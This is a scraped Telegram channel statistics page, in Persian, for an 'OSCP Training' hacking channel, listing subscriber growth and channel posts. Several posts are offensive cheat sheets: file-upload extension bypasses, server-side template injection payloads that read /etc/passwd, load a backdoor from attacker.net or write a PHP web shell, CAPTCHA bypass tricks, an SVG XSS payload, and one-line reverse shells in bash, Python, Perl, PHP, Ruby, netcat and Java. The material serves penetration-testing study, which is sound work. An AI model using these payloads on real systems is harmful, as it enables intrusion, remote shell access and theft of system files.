🔥OSCP Training🔥🛡⚔️👨🏻💻
رفتن به کانال در Telegram
Offensive Security Certified Professional @CEH_training @WebHacking @pfsense @WifiHacking 🔰For safer days
نمایش بیشترکشور مشخص نشده استفناوری و برنامهها11 688
7 490
مشترکین
اطلاعاتی وجود ندارد24 ساعت
+37 روز
-2030 روز
در حال بارگیری داده...
کانالهای مشابه
هیچ دادهای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
ابر برچسبها
هیچ دادهای
مشکلی وجود دارد؟ لطفاً صفحه را تازه کنید یا با مدیر پشتیبانی ما تماس بگیرید.
اشارات ورودی و خروجی
---
---
---
---
---
---
جذب مشترکین
مارس '25
مارس '250
در 0 کانالها
فوریه '25
+56
در 0 کانالها
Get PRO
ژانویه '25
+61
در 0 کانالها
Get PRO
دسامبر '24
+62
در 0 کانالها
Get PRO
نوامبر '24
+74
در 0 کانالها
Get PRO
اکتبر '24
+90
در 0 کانالها
Get PRO
سپتامبر '24
+114
در 0 کانالها
Get PRO
اوت '24
+156
در 0 کانالها
Get PRO
ژوئیه '24
+185
در 0 کانالها
Get PRO
ژوئن '24
+219
در 1 کانالها
Get PRO
مه '24
+259
در 0 کانالها
Get PRO
آوریل '24
+193
در 1 کانالها
Get PRO
مارس '24
+133
در 1 کانالها
Get PRO
فوریه '24
+179
در 0 کانالها
Get PRO
ژانویه '24
+189
در 3 کانالها
Get PRO
دسامبر '23
+188
در 2 کانالها
Get PRO
نوامبر '23
+176
در 0 کانالها
Get PRO
اکتبر '23
+154
در 1 کانالها
Get PRO
سپتامبر '23
+204
در 0 کانالها
Get PRO
اوت '23
+255
در 0 کانالها
Get PRO
ژوئیه '23
+297
در 0 کانالها
Get PRO
ژوئن '23
+239
در 0 کانالها
Get PRO
مه '23
+266
در 0 کانالها
Get PRO
آوریل '23
+218
در 0 کانالها
Get PRO
مارس '23
+244
در 0 کانالها
Get PRO
فوریه '23
+231
در 0 کانالها
Get PRO
ژانویه '23
+256
در 0 کانالها
Get PRO
دسامبر '22
+222
در 0 کانالها
Get PRO
نوامبر '22
+247
در 0 کانالها
Get PRO
اکتبر '22
+220
در 0 کانالها
Get PRO
سپتامبر '22
+247
در 0 کانالها
Get PRO
اوت '22
+199
در 0 کانالها
Get PRO
ژوئیه '22
+230
در 0 کانالها
Get PRO
ژوئن '22
+187
در 0 کانالها
Get PRO
مه '22
+139
در 0 کانالها
Get PRO
آوریل '22
+464
در 0 کانالها
Get PRO
مارس '220
در 0 کانالها
Get PRO
فوریه '220
در 0 کانالها
Get PRO
ژانویه '220
در 0 کانالها
Get PRO
دسامبر '21
+107
در 0 کانالها
Get PRO
نوامبر '21
+139
در 0 کانالها
Get PRO
اکتبر '21
+231
در 0 کانالها
Get PRO
سپتامبر '21
+120
در 0 کانالها
Get PRO
اوت '21
+135
در 0 کانالها
Get PRO
ژوئیه '21
+143
در 0 کانالها
Get PRO
ژوئن '21
+150
در 0 کانالها
Get PRO
مه '21
+138
در 0 کانالها
Get PRO
آوریل '21
+163
در 0 کانالها
Get PRO
مارس '21
+165
در 0 کانالها
Get PRO
فوریه '21
+192
در 0 کانالها
Get PRO
ژانویه '21
+247
در 0 کانالها
Get PRO
دسامبر '20
+1 077
در 0 کانالها
| تاریخ | رشد مشترکین | اشارات | کانالها | |
| 02 مارس | 0 | |||
| 01 مارس | 0 |
پستهای کانال
| 2 | بدون متن... | 2 574 |
| 3 | بدون متن... | 2 924 |
| 4 | Wireshark.pdf | 2 737 |
| 5 | Web Application Lab Setup Guide .pdf | 2 700 |
| 6 | OSCP Cheat Sheet-2.pdf | 3 967 |
| 7 | RedTeam Scenarios.pdf.pdf | 299 |
| 8 | OSCP Exam Report.pdf | 3 954 |
| 9 | OSCP Notes 2.pdf | 4 919 |
| 10 | بدون متن... | 4 755 |
| 11 | File Upload Bypass -
Blacklisting Bypass
PHP → .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr
Whitelisting Bypass
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg | 3 953 |
| 12 | @OSCP_training
@WebHacking | 3 335 |
| 13 | SSTI (Server Side Template Injection)
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}} | 3 178 |
| 14 | Google Dorks to Find Sensitive data or dir | 2 295 |
| 15 | APIs Fuzzing for Bug Bounty.pdf | 2 863 |
| 16 | CAPTCHA Bypass
* Send old captcha value.
* Send old captcha value with old session ID.
* Remove captcha with any adblocker and request again
* Bypass with OCR
* Response manipulation.
* Use any token with the same length(+1/-1).
* Remove the param value or remove the entire parameter.
* Change the method from POST to GET(or PUT) and remove the captcha.
* Change body to JSON or vice-versa.
* Check whether the value of the captcha is in the source code.
* Add headers:
X-Forwarded-Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
X-Host: 127.0.0.1 | 3 709 |
| 17 | Tryhackme.pdf | 5 849 |
| 18 | Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg> | 4 930 |
| 19 | WhatsApp'ta OSCP Training kanalını takip edin: https://whatsapp.com/channel/0029VaDxObG17EmxK6bvmy3a | 2 745 |
| 20 | Reverse Shell Cheat Sheet
Bash;
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
Python;
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PERL;
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP;
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby;
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Netcat;
nc -e /bin/sh 10.0.0.1 1234
Java;
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
xterm;
xterm -display 10.0.0.1:1 | 3 037 |
